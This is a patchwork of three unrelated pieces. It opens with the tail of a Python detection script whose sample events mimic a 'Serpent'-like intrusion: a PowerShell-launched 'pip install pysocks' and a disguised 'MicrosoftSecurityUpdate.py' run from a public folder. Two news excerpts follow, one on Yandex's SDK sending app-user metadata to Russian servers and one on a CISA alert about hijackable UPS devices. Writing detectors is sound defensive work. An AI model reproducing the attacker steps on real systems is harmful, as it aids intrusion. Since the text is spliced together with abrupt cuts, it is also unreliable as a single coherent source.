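    {"parent_image": PS, "image": r"C:\Python310\Scripts\pip.exe", "command_line": "pip install pysocks"},
    {"parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Python310\python.exe",
     "command_line": r"python C:\Users\Public\MicrosoftSecurityUpdate.py"},
]

BENIGN_EVENTS = [  # constructed: an admin installing Python through Chocolatey
    {"parent_image": r"C:\Windows\System32\cmd.exe", "image": PS, "command_line": CHOCO_BOOTSTRAP},
    {"parent_image": PS, "image": r"C:\ProgramData\chocolatey\choco.exe", "command_line": "choco install python -y"},
]

if __name__ == "__main__":
    print(matched_stages(SAMPLE_EVENTS), is_serpent_like(SAMPLE_EVENTS))
    print(matched_stages(BENIGN_EVENTS), is_serpent_like(BENIGN_EVENTS))
```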
 
Russia’s biggest Internet company has embedded code into apps found on mobile devices that allows information about millions of users to be sent to servers located in its home country.

The revelation relates to software created by Yandex that permits developers to create apps for devices running Apple’s iOS and Google’s Android, systems that run the vast majority of the world’s smartphones.

Yandex collects user data harvested from mobile phones before sending the information to servers in Russia. Researchers have raised concerns the same “metadata” may then be accessed by the Kremlin and used to track people through their mobile phones.

Researcher Zach Edwards first made the discovery regarding Yandex’s code as part of an app auditing campaign for Me2B Alliance, a nonprofit. Four independent experts ran tests for the Financial Times to verify his work.

Yandex has acknowledged its software collects “device, network, and IP address” information that is stored “both in Finland and in Russia,” but it called this data “non-personalized and very limited.” It added: “Although theoretically possible, in practice it is extremely hard to identify users based solely on such information collected. Yandex definitely cannot do this.”

The revelations come at a critical time for Yandex, often referred to as “Russia’s Google,” which has long attempted to chart an independent path without falling foul of Russian President Vladimir Putin’s desire for greater control of the Internet.

The company said it followed “a very strict” internal process when dealing with governments: “Any requests that fail to comply with all relevant procedural and legal requirements are turned down.”

But Cher Scarlett, formerly a principal software engineer in global security at Apple, said once user information was collected on Russian servers, Yandex could be obliged to submit it to the government under local laws. Other experts said that the metadata of the sort collected by Yandex could be used to identify users.

Ron Wyden, chair of the US Senate’s finance committee and one of the architects of US Internet regulation, heavily criticized Google and Apple for not doing enough to secure smartphones from the Yandex software, which has found its way onto 52,000 apps reaching hundreds of millions of consumers.

“These apps leech private, sensitive data from apps on your phone, threatening US national security and the privacy of Americans and other individuals around the world,” he said.

Yandex is considered a global tech giant and is listed on the New York Stock Exchange and majority-owned by American funds. It is incorporated in Amsterdam, and founder Arkady Volozh lives in Israel. In 2019, the company reached an agreement with the Russian government, codifying a structure that ensures that Moscow can intervene on some issues such as foreign acquisitions without control of day-to-day operations.
 
“In recent years, UPS vendors have added an Internet of Things [IoT] capability, and UPSs are routinely attached to networks for power monitoring, routine maintenance and/or convenience,” according to a Tuesday alert from CISA (PDF). “Loads for UPSs can range from small (e.g., a few servers) to large (e.g., a building) to massive (e.g., a data center).”

If attackers are able to remotely take over the devices, they can be used for a host of nefarious ends. For instance, bad actors can use them as a jumping-off point to breach a company’s internal network and steal data. Or, in a grimmer scenario, they could be used to cut power for mission-critical appliances, equipment or services, which could cause physical injury in an industrial environment, or disrupt business services, leading to significant financial losses.

Further, cyberattackers could also execute remote code to alter the operation of the UPSs themselves, or physically damage them (or the devices connected to them).

“It’s easy to forget that every device connected to the internet is at increased risk of attack,” Tim Erlin, vice president of strategy at Tripwire, noted via email. “Just because a vendor provides the capability to put a device on the internet, doesn’t mean that it’s set up to be secure. It’s up to each organization to ensure that the systems they deploy are configured securely.”
 